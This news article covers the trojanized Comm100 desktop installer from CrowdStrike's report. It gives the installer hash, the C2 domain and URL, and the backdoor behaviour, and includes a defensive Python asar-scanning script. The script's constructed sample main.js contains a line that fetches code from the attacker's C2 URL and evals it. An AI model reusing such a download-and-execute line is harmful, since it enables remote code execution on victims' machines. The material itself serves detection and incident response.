Researchers discovered a supply-chain attack on chat service provider Comm100 that affected numerous companies. The attackers trojanized the installer for the Comm100 desktop client and distributed it from the vendor's own website. Comm100 has since released a clean build; users should confirm that they are running the fixed installer, version 10.0.9, and remove any earlier copies.
Comm100 Chat Service Supply-Chain Attack
According to a recent report from CrowdStrike, a suspected China-nexus threat actor compromised the Comm100 chat service in a supply-chain attack.
Comm100 is a customer service and communication SaaS platform used by numerous businesses. Because its chat client runs inside customers' own environments, a compromise of the tool directly exposes those client businesses.
According to CrowdStrike's intelligence team, the trojanized installer was available from September 27, 2022, through the morning of September 29, 2022. During that window it infected organizations in the healthcare, industrial, insurance, manufacturing, technology, and telecommunications sectors in Europe and North America.
CrowdStrike researchers found that the threat actors had replaced an otherwise legitimate installer for the Comm100 desktop client for Windows with a trojanized build, which was then served for download from the company's own website. Software fetched from a vendor's official site rarely attracts suspicion, which is what made this distribution channel so effective at evading detection.
The malicious installer contained a JavaScript backdoor that downloads and executes second-stage malware. As CrowdStrike stated in its post:
This installer (SHA256 hash: ac5c0823d623a7999f0db345611084e0a494770c3d6dd5feeba4199deee82b86) is an Electron application that contains a JavaScript (JS) backdoor within the file main.js of the embedded Asar archive.
The backdoor downloads and executes a second-stage script from URL http[:]//api.amazonawsreplay[.]com/livehelp/collect.
The second-stage script establishes command-and-control (C&C) communication, collects information about the infected host, and gives the attackers remote shell access.
Once the backdoor is established, the attackers deploy additional files, including the legitimate Microsoft Metadata Merge Utility (mdmerge.exe) and a malicious loader named MidlrtMd.dll, which the legitimate binary side-loads. The loader decrypts an embedded payload, which in turn injects a further payload, so that the attackers' activity continues under the cover of a trusted Microsoft binary.
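To turn the indicators above into a check a defender can actually run, here is an added example in Python (not code from CrowdStrike or Comm100): it reads the asar container format that Electron applications use, walks the archive's file table, and flags any embedded file, main.js in particular, that references the reported C&C domain; separately, it compares a file's SHA-256 against the reported installer hash. The asar archive and its main.js are constructed in memory as a stand-in and are not the real backdoor; the domain is spelled out un-defanged because that is how it would appear in code.

```python
"""Hunt for the Comm100 trojanized-installer indicators in an Electron asar archive.

Added example, not code from CrowdStrike or Comm100. It implements a minimal reader
for the asar container format used by Electron apps, searches every embedded file
(main.js in particular) for the reported C2 domain, and compares a file's SHA-256
against the reported installer hash. The sample archive below is constructed in
memory; its main.js is a stand-in, not the actual backdoor.
"""
import hashlib
import json
import struct
from typing import Dict, Iterator, Tuple

# Indicators quoted in the article (from CrowdStrike's report); the domain is given
# in plain, un-defanged form because that is how it appears inside code.
IOC_INSTALLER_SHA256 = "ac5c0823d623a7999f0db345611084e0a494770c3d6dd5feeba4199deee82b86"
IOC_C2_DOMAIN = b"api.amazonawsreplay.com"


def _pickle(payload: bytes) -> bytes:
    """Chromium Pickle framing: uint32 LE payload length, payload, pad to 4 bytes."""
    return struct.pack("<I", len(payload)) + payload + b"\0" * ((-len(payload)) % 4)


def build_asar(files: Dict[str, bytes]) -> bytes:
    """Pack {name: content} into a flat asar archive (used only to construct the sample)."""
    entries, blobs, offset = {}, [], 0
    for name, data in files.items():
        entries[name] = {"size": len(data), "offset": str(offset)}  # asar stores offsets as strings
        blobs.append(data)
        offset += len(data)
    header_json = json.dumps({"files": entries}).encode()
    header_pickle = _pickle(_pickle(header_json))          # Pickle.writeString() inside a Pickle
    size_pickle = _pickle(struct.pack("<I", len(header_pickle)))
    return size_pickle + header_pickle + b"".join(blobs)


def read_asar(blob: bytes) -> Tuple[dict, int]:
    """Parse the asar header; return (header JSON, offset where file data begins)."""
    size_len, header_size = struct.unpack_from("<II", blob, 0)
    if size_len != 4 or len(blob) < 8 + header_size:
        raise ValueError("not an asar archive")
    _payload_len, str_len = struct.unpack_from("<II", blob, 8)
    header = json.loads(blob[16:16 + str_len])
    return header, 8 + header_size


def iter_files(node: dict, prefix: str = "") -> Iterator[Tuple[str, dict]]:
    """Walk the (possibly nested) header tree, yielding (path, entry) for each file."""
    for name, entry in node.get("files", {}).items():
        path = prefix + name
        if "files" in entry:
            yield from iter_files(entry, path + "/")
        else:
            yield path, entry


def scan_asar_for_c2(blob: bytes) -> list:
    """Return the paths of embedded files that reference the reported C2 domain."""
    header, base = read_asar(blob)
    hits = []
    for path, entry in iter_files(header):
        if entry.get("unpacked"):       # content lives outside the archive; not inspected here
            continue
        start = base + int(entry["offset"])
        if IOC_C2_DOMAIN in blob[start:start + entry["size"]]:
            hits.append(path)
    return hits


def matches_installer_hash(blob: bytes) -> bool:
    """True if the file's SHA-256 equals the trojanized installer hash from the report."""
    return hashlib.sha256(blob).hexdigest() == IOC_INSTALLER_SHA256


# Constructed sample: a small Electron layout whose main.js fetches and evals a
# second stage from the reported C2 URL. Stand-in content, not the real backdoor.
SAMPLE_ASAR = build_asar({
    "package.json": b'{"name": "chat-client", "main": "main.js"}',
    "main.js": (b"const { app } = require('electron');\n"
                b"fetch('http://api.amazonawsreplay.com/livehelp/collect')"
                b".then(r => r.text()).then(eval);\n"),
    "renderer.js": b"document.title = 'Live Chat';\n",
})

if __name__ == "__main__":
    print("installer hash match:", matches_installer_hash(SAMPLE_ASAR))
    print("files referencing C2:", scan_asar_for_c2(SAMPLE_ASAR))
```

In practice the two checks apply to different artefacts: run matches_installer_hash over the downloaded installer file, and run scan_asar_for_c2 over the resources/app.asar of an installed copy of the client. A domain-string match is a quick triage signal, not proof of compromise, and an obfuscated backdoor would not necessarily carry the domain in clear text, so treat a miss as inconclusive and a hit as a reason to pull the host for forensics.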
Comm100 Released A Clean Installer
CrowdStrike has confirmed that Comm100 has published a clean installer, version 10.0.9, on its website. Administrators should install the clean version, remove any copies of the earlier build, and check their endpoints for the installer hash and the C&C domain given above.
It is not yet clear whether the attack disrupted operations at any affected client businesses. As for attribution, CrowdStrike suspects the same actor ran a recent malicious campaign targeting online gambling sites.
Let us know your thoughts in the comments.